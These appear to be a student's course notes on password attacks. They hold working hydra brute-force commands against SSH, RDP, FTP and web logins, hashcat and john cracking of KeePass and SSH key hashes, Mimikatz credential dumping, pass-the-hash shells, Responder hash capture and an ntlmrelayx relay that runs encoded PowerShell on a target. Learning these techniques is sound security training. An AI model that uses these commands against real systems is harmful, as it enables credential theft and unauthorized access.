Module 15: Password Attacks
Attacking Network Services Logins
SSH and RDP
Brute force SSH with known username and unknown password on abnormal port number (-t 4 due to SSH commonly limiting parallel tasks to 4):
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 -t 4 ssh://192.168.50.201
Brute force RDP with unknown username and known password:
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
Brute force FTP with unknown username and unknown password:
hydra -L /usr/share/wordlists/dirb/others/names.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.50.203
HTTP POST Login Form
Brute force HTTP POST login form with unknown username and unknown password:
hydra -L /usr/share/wordlists/dirb/others/names.txt -P /usr/share/wordlists/rockyou.txt <target.ip.goes.here> http-post-form "/index.php:fm_usr=^USER^&fm_pwd=^PASS^:Login failed. Invalid"
This targets a webpage hosting a login form at /index.php, followed by a colon, then the post-form fields found via burpsuite, followed by an additional colon, followed finally by the invalid login text displayed to help hydra understand failures vs. successes.
Brute force HTTP GET login form with known username and unknown password:
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target.ip.goes.here> http-get "/"
Password Cracking Fundamentals
Introduction to Encryption, Hashes and Cracking
John the Ripper is more a CPU-based crackin tool, which also supports GPUs.
JtR can be run without additinoal drivers using only CPUs for cracking.
Hashcat is mainly a GPU-based cracking tool that also support CUPs.
Hashcat requires OpenCL or CUDA for the GPU cracking process.
For most algorithms, a GPU is faster than a CPU. However, some slow hashing algorithms (like bcrypt) work better on CPUs.
Cracking time can be calculated by dividing the keyspace with the hash rate. The keyspace is the character set to teh power of the amount of characters/length of the original information. For example lower-case Latin alphabet (26 chars), upper-case Latin alphabet (26 chars), and 0-9 (10 chars) will result in 62 total characters.
A five-character long password would result in the keyspace being 62^5, i.e. 916,132,832 unique variations.
Mutating Wordlists
Now, let's capitalize every password by including the c rule function, next putting the rule functions on separate lines to make two mutated passwords:
Finally, let's add an exclamation mark before the one, and capitalizing the password:
Using hashcat along with a demo rule to crack a MD5 hash:
hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo.rule
Premade hashcat rules can be found at:
/usr/share/hashcat/rules/
Cracking Methodology
Steps to crack hashes:
Extract hashes
Find the hash
Format hashes
Utilize tools like
hashidorhash-identifierto identify the hash you've found.
Calculate the cracking time
Is it feasible to try and crack the hash? Weigh against the time available on the assessment.
Prepare wordlist
Investigate password policies, check out password leaks for samples.
Attack the hash
Ensure there are no additional characters, i.e. spaces, newlines, etc. copied into the hash as any additional information will affect it.
Password Manager
Example scenario: RDP'd onto a device with KeePass installed.
Transfer the .kdbx file to our kali box then we can use scripts like keepass2john to format the database password into a crackable hash for john/hashcat.
keepass2john Database.kdbx > keepass.hash
Since KeePass uses a master password without any kind of username, we need to remove the Database string prepended to the hash along with the colon separating it from the hash itself.
Finding a hash type in hashcat without resorting to searching the Wiki/internet:
hashcat --help | grep -i "KeePass"
SSH Private Key Passphrase
Transform the id_rsa to a format for john/hashcat:
ssh2john id_rsa > ssh.hash
Similar to the keepass database password hash, remove the filename from the hash.
Finding a hash type in hashcat without resorting to searching the Wiki/internet:
hashcat --help | grep -i "ssh"
Using a hashcat rule file for john requires adding a name for the rule and appending them to /etc/john/john.conf. In this case, we'll name the rule sshRules. Finally, we'll use this rule with john to crack the password:
Working with Password Hashes
Cracking NTLM
Windows stores hashed user passwords in the Security Account Manager (SAM) database file. Modern systems store passwords as NTLM hashes. Older systems may be storing them in LAN Manager (LM) form which is very weak. LM is disabled by default beginning with Vista and Server 2008.
NTLM hash === NTHash.
Because the kernel has a lock on the SAM database while the system is running, we use tools like Mimikatz to bypass this restriction. It can extract plain-text passwords and hashes. It includes the sekurlsa module, which extracts password hashes from the Local Security Authority Subsystem (LSASS) process memory. LSASS handles user authentication, password changes, and access token creation.
Mimikatz can only extract passwords if run as Administrator (or higher) with SeDebugPrivilege access rights. Using the built-in token elevation function of Mimikatz requires the SeImpersonatePrivilege access rights -- all local administrators have this access right.
Using Mimikatz:
Passing NTLM
Pass-the-Hash (PtH) requires the remote computer to have an account with the same username and password. Since Vista, all Windows versions have UAC remote restrictions enabled by default, meaning pass-the-hash will likely only work for the local Administrator account.
To leverage pass-the-hash, you must use a tool that supports authentication with NTLM hashes. Some examples include:
SMB Enumeration/Management
smbclient
CrackMapExec
Command Execution
impacket library tools
psexec.py
wmiexec.py
Using smbclient to PtH:
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash <hash_here>
Using psexec.py for PtH and get an interactive shell as SYSTEM. In the hash section, since we only use the NTLM hash, the LMHash can be replace with 32 zeroes. A command can be entered at the end, otherwise leaving it blank will default to cmd.exe:
Using wmiexec.py for the same reason as psexec.py will result in an interactive shell as the user:
Cracking Net-NTLMv2
Net-NTLMv2 === NTLMv2 NTLMv2 < Kerberos in terms of security.
Responder is great for beginning our abuse of NTLMv2's weaknesses.
If we have Responder listening on our device, we can initiate the authentication via an exploited device (without admin perms) simply by running ls \\our.listening.ip.here\share via PowerShell.
Setting up Responder
At this point, Responder should have captured the user's NTLMv2-SSP Hash which we can save to a file for cracking. Hashcat uses mode 5600 for NetNTLMv2.
Relaying Net-NTLMv2
Similar to sending the NetNTLMv2 SMB communication to Responder, in this case we'll be forwarding along the hash to another device (we're assuming the time taken to crack the hash isn't feasible). To do so, we'll use the tool impacket-ntlmrelayx.
Example use-case, we'll be disabling the HTTP server, adding support for SMB2, and targeting 192.168.50.212. Lastly, we'll set our command. Remember to UTF-16LE encode the powershell before base64ing it:
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
Last updated